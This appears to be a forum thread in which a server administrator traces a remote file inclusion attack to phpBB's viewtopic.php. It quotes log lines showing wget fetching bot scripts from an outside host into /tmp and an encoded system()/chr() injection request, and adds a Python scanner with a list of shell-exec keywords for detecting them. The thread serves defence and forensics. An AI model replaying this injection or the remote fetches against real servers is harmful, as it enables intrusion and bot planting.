gerrybakker
asked on
How do I find a script being used as a "Remote File Inclusion" exploit on my server?
How do I find a script being used as a "Remote File Inclusion" exploit on my server? Every few seconds the error log shows an entry like this.
--16:19:54-- http://mobile-portal.info/myfiles/expl/linuxday.txt
(try:13) => `/tmp/.girl'
Connecting to mobile-portal.info[88.212.221.4]:80...
--16:19:56-- http://mobile-portal.info/myfiles/expl/linuxdaybot.txt
(try:14) => `/tmp/.girl2'
Connecting to mobile-portal.info[88.212.221.4]:80...
--16:20:04-- http://mobile-portal.info/myfiles/expl/linuxdaybot.txt
(try:13) => `/tmp/.girl2'
Connecting to mobile-portal.info[88.212.221.4]:80... failed: Connection timed out.
Retrying.
failed: Connection timed out.
Obviously my firewall is preventing it from completing its IRC planting mission - which is great - so nothing is actually getting dropped into my /tmp folder while the firewall is up and running, but many bots out there are automatically trying my defenses all day and they are all using the same script on my server to access my server, but I can't find a trace of what they are using to access it. Either the script is an innocent and exploitable script that belongs to a regular product like a forum, or it was planted there by a malicious user.
I have successfully used netstat and grep to determine the IPs of many of the machines that are trying to get in, and I have added those IPs to my iptables to stop them, but new ones keep showing up, so something exploitable is sitting on my server. I have 1000 websites on this server, so I can't just say "oh, it's my forum script that needs upgrading" - I need to figure out how to search for a log record somewhere that would have the actual event and file location of the exploit.
I've asked a number of my super Linux tech friends and have come up empty handed so far.
Any ideas? I've been scratching my head for 4 days trying to come up with inventive ways to find the culprit.
ASKER
m1tk4 thanks for the forehead slapping obvious answer - "check the 1000 apache logs". It was staring me in the face but I couldn't see the trees for the forest. It was just too obvious.
After identifying the IP addresses I then did a grep for those IP addresses in the /var/log/httpd/domains folder to find the scripts that were being used.
grep -n -r -I "221.169.150.160" *
The results showed extended character codes in the string to hide the real string. You would never know or find the text string "http://mobile-portal.info/myfiles/expl/linuxdaybot.txt" in this result, but it didn't matter because it was definitely the IP address that was running the wget session. Mystery solved.
Sample line found in the log with the correct IP address:
mwarriors.com.log:242:221.169.150.160 - - [01/May/2006:08:57:24 -0700] "GET /phpBB2/viewtopic.php?p=194&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 23026 "-" "Mozilla/4.0"
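The grep above finds lines by attacker IP, but with a thousand vhost logs it is more useful to scan for the request shape itself: a double-URL-encoded query that carries system()/chr() in the phpBB highlight parameter. The following Python is an added example written for this thread, not code from the post or from phpBB; it parses Apache combined-format lines, decodes the query twice, flags suspect ones, and reconstructs the chr() sequence so you can see what the probe tried to run. The first sample line is the request quoted in the post; the second is a constructed benign request for contrast.

```python
import re
from urllib.parse import unquote

# Constructed sample log: line 1 is the request quoted in the post above,
# line 2 is a made-up benign search on the same script.
SAMPLE_LOG = """\
221.169.150.160 - - [01/May/2006:08:57:24 -0700] "GET /phpBB2/viewtopic.php?p=194&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 23026 "-" "Mozilla/4.0"
10.0.0.5 - - [01/May/2006:09:00:01 -0700] "GET /phpBB2/viewtopic.php?p=194&highlight=linux HTTP/1.1" 200 18000 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)
CHR_RE = re.compile(r'chr\((\d+)\)')
# Function names that have no business in a forum search term.
SUSPECT = ('system(', 'passthru(', 'exec(', 'shell_exec(', 'chr(')


def decode_chr(text):
    """Turn chr(112).chr(101)... into the literal string the attacker built."""
    return ''.join(chr(int(n)) for n in CHR_RE.findall(text))


def analyse(line):
    """Return a finding dict for a suspect request line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group('target').partition('?')
    # %2527 -> %27 -> ' : the payload is encoded twice, so decode twice.
    decoded = unquote(unquote(query))
    if not any(s in decoded.lower() for s in SUSPECT):
        return None
    return {
        'ip': m.group('ip'),
        'script': path,            # the vulnerable script on your server
        'status': m.group('status'),
        'command': decode_chr(decoded),
    }


def scan(log_text):
    """Scan a whole log file's text and collect the suspect requests."""
    return [hit for hit in (analyse(l) for l in log_text.splitlines()) if hit]


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Run it over `/var/log/httpd/domains/*` to get, per vhost, the source IP, the script path being hit, and the decoded command; the page's sample decodes to a harmless perl print, which is how these bots test whether the hole is open before fetching anything.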
ASKER
Apparently - in this case it was the viewtopic.php file in phpBB that was being exploited.
>>it was the viewtopic.php file in phpBB
exactly.
And why would it be a refund? I certainly object.
Also, it's not clear WHAT error log shows this - is this your apache error log or something else?